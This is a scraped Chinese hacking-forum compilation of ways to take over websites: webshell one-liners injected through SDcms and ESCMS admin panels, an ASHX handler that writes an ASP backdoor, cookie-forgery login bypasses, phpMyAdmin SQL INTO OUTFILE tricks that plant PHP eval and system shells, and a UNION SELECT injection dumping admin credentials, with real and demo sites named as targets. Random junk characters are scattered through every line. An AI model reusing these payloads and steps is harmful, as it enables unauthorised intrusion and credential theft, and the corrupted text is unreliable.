4 \( y: s t |# D* _+ {5 l% V<input id="btnUpload" type="submit" value="Upload">6 M* i6 |2 g3 b: `& M* P7 s
</form>
6 D# l7 j) N) p5 m" M----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- `+ P" `! f# o& s
4 Q# q& r& G$ H7 e; }$ WSDcms 后台拿webshell
2 {9 `' j) A, O( q
" b( |4 S: Z* O: J8 Y2 W4 E) v% O第一种方法:- C; M3 r* m c7 N0 f: z
进入后台-->系统管理-->系统设置-->系统设置->网站名称;* M) V" ]0 _2 p+ L
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
+ Q4 s6 [1 [2 @0 J$ e: _) j5 C用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
' B3 C" Y+ h6 T0 S+ p$ [ e. u: t第二种方法:( i- T! C" `$ X2 ~3 C }
进入后台-->系统管理-->系统设置-->系统设置->上传设置;5 y( {/ @* q$ M
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 \/ l% d) f. j& J第三种方法:
+ l8 }. \8 S" U( H3 P# x进入后台-->界面管理-->模板文件管理-->创建文件! M( P- X, T) V J; K% P. f7 N
文件名写入getshell.ashx+ h& L, a+ [2 V
内容写入下面内容:8 I; B) A" Q2 A' [
/====================复制下面的=========================/
' n1 R4 N; V I# i6 w6 j<%@ WebHandler Language="C#" Class="Handler" %>
3 t2 Q3 ]$ G% n. Ausing System;* j {2 h- [! P1 e
using System.Web;
7 i, S2 D. a5 v6 ~- tusing System.IO;
2 [% S" ]- l2 m% P. N* M) mpublic class Handler : IHttpHandler {
& Z. w' r! n8 Y6 l. Gpublic void ProcessRequest (HttpContext context) {- E+ B! T9 L0 o4 k
context.Response.ContentType = "text/plain";. L" C% o% D) O4 V( Q/ w
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));9 C, M9 C7 A! V1 \5 p4 W U
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");. |3 {7 j# Z3 H% J" B) r
file1.Flush();7 a1 g5 P+ Z3 H G
file1.Close();# T% e0 [* m, h6 o9 B
}3 e& V7 y* y5 }( ?; p* z8 z& W
public bool IsReusable {
7 t9 [ C" ?3 Sget {% B+ c+ R* p/ B: t# `0 E! m
return false;
3 K3 i1 e# M6 g% B$ v. q$ `}
5 m: C2 i, [ |5 `2 q, L2 g6 Y: _}
" P5 T5 @) Y. z( u$ U}# @$ v$ B# M" s
/=============================================/
( z ~; I9 a0 L% j7 f访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx$ H, q" T; @1 s" ~# {9 Q
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
" A6 R; H* y! u) c: O9 x' j% p-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@/ |1 u' d4 C+ a0 r
7 t3 p: n1 o* A- R7 T2 y- iESCMS网站管理系统0day
D% S) K1 c. y' y# q
+ r l3 c0 C+ u0 {- n# L+ m* K后台登陆验证是通过admin/check.asp实现的
/ V. G! n9 p7 j
5 l& I4 Y, [5 y p3 d' y1 J首先我们打开http://target.com/admin/es_index.html% M& c6 L7 s# a3 w
然后在COOKIE结尾加上
8 `! F1 d* t: k3 g! u W! X; ESCMS$_SP2=ES_admin=st0p;$ u7 B1 Y6 I: Q' |8 _1 A4 K) F5 K
修改,然后刷新
. W: C, G1 r; y; W进后台了嘎..2 Z" y0 v4 n" w
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL2 N; V/ }0 ~5 R c
0 L; ]% i( }4 F2 G利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% s% N; _+ i/ z! j8 |; Q- ~嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp' B! f" g. S1 q! l4 Y# a9 b8 @+ Y
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..) ^( |; O9 M- U% @5 P
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
/ _1 U8 Q5 A0 z, A4 d; ~8 |& o------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 ~7 s# S9 `+ R2 A9 W" M8 Q7 v/ C M! f& _' s
宁志网站管理系统后台无验证漏洞及修复
& R$ m0 N( A* R0 A2 `) T, h' }% u/ C/ z8 d- k: Q
网上搜了一下,好像没有发布.如有雷同纯粹巧合!7 [. c) s& ]6 W% Z/ f9 K9 \
官方网站:www.ningzhi.net6 r7 y$ |# F- B. l3 S; f# v
学校网站管理系统 V.2011版本 + \- ^+ E- _5 ~9 ]% t$ T
http://down.chinaz.com/soft/29943.htm 6 X0 \ n9 G/ Y" |7 P
其它版本(如:政府版等),自行下载. B/ @: d$ i1 x
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
9 `8 g$ X1 }2 N9 Qlogin.asp代码如下:4 U( `8 T/ A5 g' r. m8 {% c. _2 V, J
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> # d5 ?/ ^% m/ h1 _9 T3 `, K2 y' J
manage.asp代码我就不帖出来了.反正也没验证., t4 G* x9 l- j3 Z" F& i' A; \
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
( a: |; N. ]+ O' X+ f漏洞利用:
. N* a( l# b4 m! z' k% j直接访问http://www.0855.tv/admin/manage.asp
- z# b- _- W& t' i; W" q) x4 k数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5$ \ L2 g" K& z) T1 z% g
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 r7 }3 Q* ?% v- `( Y! w( o* V
5 d- g1 V$ M8 J; c7 sphpmyadmin拿shell的四种方法总结及修复
' T1 e& k/ }" M/ C5 v$ x ~' w( H K: }+ [) R; A6 o ?
方法一:" [# R) I' ~2 P+ |& h+ ]
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );. U7 u8 u) j \. x
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
# C' f6 o4 ^6 d4 H' u2 |SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';, F7 M, d7 p) X: H; V2 {
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
& p! [" w6 w5 u+ o9 e4 W7 @' h' i 一句话连接密码:7on$ H# E" L5 c8 h- ^2 D8 w
方法二:
! ` {9 }" J- o8 t) d- l0 M I读取文件内容: select load_file('E:/xamp/www/s.php');+ w: k6 N5 `) Q5 Q
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'; J8 q; w4 P7 G5 u3 R
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'' r! s2 g, n g0 R* W1 {! }
方法三:
6 C$ Y& }' W$ ^" o$ bJhackJ版本 PHPmyadmin拿shell* M& X1 e' E- S7 ~7 C. }' ]0 Q
Create TABLE study (cmd text NOT NULL);
/ T2 [3 u, g$ h, y; nInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
0 h) x1 f+ z/ N# q* w/ K% v& [select cmd from study into outfile 'E:/wamp/www/7.php';* k- ?6 C. H( ?. w2 u3 j( H
Drop TABLE IF EXISTS study;" \8 }; T9 C4 n+ z
<?php eval($_POST[cmd])?>1 ~9 g# f* q9 }5 L- d, d$ [& q
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。6 l2 v2 {# q/ i& j! ]/ c
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1+ S! B* g+ P# A/ c8 v7 b' Q
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 16 ]$ |) M( U. z2 x, {: u
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
2 G- H# D2 R1 J+ w4 Z方法四:% D! x9 w B+ T; K, t; u1 _0 M
select load_file('E:/xamp/www/study.php');1 A% @0 n% d) |( U/ s5 f! m
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
4 S" z% U9 D& \% L* o1 Z# j然后访问网站目录:http://www.2cto.com/study.php?cmd=dir; l! n7 S; M3 ]' {% V+ B1 `" e; K
----------------------------------------------------------------------------------------------------------------------------------------------------------------------- q6 q2 D0 q8 ]% v
5 A4 ^$ ~1 u& j: e9 uNO.001中学网站管理系统 Build 110628 注入漏洞
: V: z+ D; J; E" W: f( c: ^0 A
0 T7 f+ @0 X5 r6 U! yNO.001中学网站管理系统功能模块:+ Q' y& Z( w$ m7 H/ F& D/ r
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等8 y( u6 }# s4 O* k
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
+ T! \3 W. h; ]3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息$ y, F; E. E" `* t/ _% ^
4.视频图片管理:一级分类,动态添加视频或者图片等信息
" m' P: j7 p9 u5.留言管理:对留言,修改,删除、回复等管理
% p. c6 X) o6 \6 I+ Q- M6.校友频道:包括校友资料excel导出、管理等功能4 G4 K, y, b1 |( G5 i; f: v
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
: w6 ~/ W9 H2 h$ T默认后台:admin/login.asp
, S& i3 _% G5 W U( e! ]官方演示:http://demo.001cms.net( t" o8 I, c. u7 Q: O# C
源码下载地址:http://down.chinaz.com/soft/30187.htm8 Y4 e# O, q# B) f3 X
EXP:
0 V0 p) _5 W& k- `7 a3 bunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin- a- y5 ^" g3 y/ f' o/ Q9 q; J+ Q e
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin& J( ~9 f" ~' k, g
getshell:后台有备份,你懂的
( @, X5 G z: y" `/ T另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。: M9 f* J" P4 R3 u2 w8 D6 L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |